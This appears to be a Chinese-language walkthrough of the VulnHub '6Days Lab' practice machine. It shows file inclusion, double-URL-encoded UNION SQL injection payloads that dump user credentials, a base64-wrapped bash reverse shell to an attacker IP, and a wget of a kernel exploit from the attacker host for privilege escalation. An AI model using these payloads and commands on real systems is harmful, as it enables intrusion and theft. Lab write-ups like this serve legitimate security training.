项目地址
https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova
靶机渗透
主机发现
arp-scan -l
nmap IP -sS
确定目标主机IP及端口,浏览器登录访问,尝试输入特殊字符引发错误,发现对符合'敏感,
该处可能存在SQL注入漏洞,返回原界面,查看网络数据包,发现有其他数据包请求
双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞
终端输入命令dirb http://192.168.70.130,遍历网页目录结构
修改src内容,访问每一个文件,要在后面添加.php,在config.php中发现了数据库密码,然后还可以查看checkpromo.php,发现了SQL查询语句内容
config.php
checkpromo.php
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入
/etc/apache2/sites-available/default
根据checkpromo.php的SQL查询内容构造payload,分别为
联合查询数据库名称:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520database()%252C2%2523
联合查询数据表名称:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(table_name)%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase()%2523
联合查询对应数据表行列:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(column_name)%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%253Ddatabase()%2520and%2520table_name%253D%2527users%2527%2523
联合查询对应数据表行列内容:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(username%252Cpassword)%252C2%2520from%2520fancydb.users%2523
获得用户账号密码,andrea,SayNoToPentests,先前主机发现时靶机打开了23端口,所以我们使用ssh命令连接目标主机
但是没有回显内容,尝试进行反弹shell,在原终端输入nc -lvvp 4444,直接使用bash连接不行,要进行base64编码
bash -i >& /dev/tcp/攻击机IP/4444 0>&1 <-----base64编码
bash -c '{echo,base64编码}|{base64,-d}|{bash,-i}' <------执行该命令
提权
这时候就能看到回显了,uname -a查看内核版本,另起一个终端,根据内核版本搜索脚本searchsploit 3.13.0,默认脚本位置为:/uer/share/exploitdb/+Path
为了让目标靶机下载该脚本,打开kali的apache服务,并且将该脚本复制到网站中让目标靶机可以下载
在靶机中输入wget http://攻击机IP/37292.c,目标靶机成功下载,因为是C文件,需要先进行编译,然后运行编译文件即可
在/home文件夹可以看到flag,运行即可
